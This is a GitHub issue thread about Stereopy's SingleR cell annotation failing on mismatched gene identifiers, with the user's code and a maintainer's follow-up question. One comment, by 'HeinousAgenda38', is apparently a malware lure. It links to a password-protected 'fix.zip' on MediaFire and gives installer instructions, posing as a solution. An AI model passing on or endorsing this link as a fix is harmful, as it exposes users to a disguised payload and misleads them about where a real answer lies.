### ISSUE TITLE
About cell annotation - reset .gene_names

### ISSUE THREAD

**Issue by x11xx1** [STOmics/Stereopy#323]
Hi, 
I‘m seeking for your kindly help. I tried to used SingleR in Stereopy to annotate the cell for saw8 output and my ref is BlueprintEncodeData.h5ad from SingleR. The code is as below, just like your tutorials.
```
test_file = './data/SN.tissue.gef'
ref_file = './data/BlueprintEncodeData.h5ad'

data = st.io.read_gef(test_file, bin_size=50)
ref = st.io.read_h5ad(ref_file)

# preprocessing
ref.tl.log1p()
ref.tl.normalize_total()

data.tl.cal_qc()
data.tl.log1p()
data.tl.normalize_total()

data.tl.single_r(
    ref_exp_data=ref,
    ref_use_col='ClusterName',
    res_key='annotation'
    #method='rapids'  #  Specifying the method as rapids means using gpu
)
```
It encountered an AssertionError: no gene of `test_exp_data.gene_names` in `ref_exp_data.gene_names`. Then I found that data.gene_names are ensembl IDs while ref.gene_names are HGNC symbols and tried to replace the gene_names.

```
ensembl_to_hgnc = pd.Series(mapping_df['Approved symbol'].values, index=mapping_df['Ensembl gene ID']).to_dict()
new_gene_names = [ensembl_to_hgnc.get(gene_id, gene_id) for gene_id in data.gene_names]
data.gene.gene_name = new_gene_names
```
However, the error message is
can't set attribute
    data.gene_names = new_gene_names
AttributeError: can't set attribute

Are there any ways to change the gene_names? Many thanks🙏

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tanliwei-coder** [comment]
@x11xx1 

Does the data.genes have column `real_gene_name`?
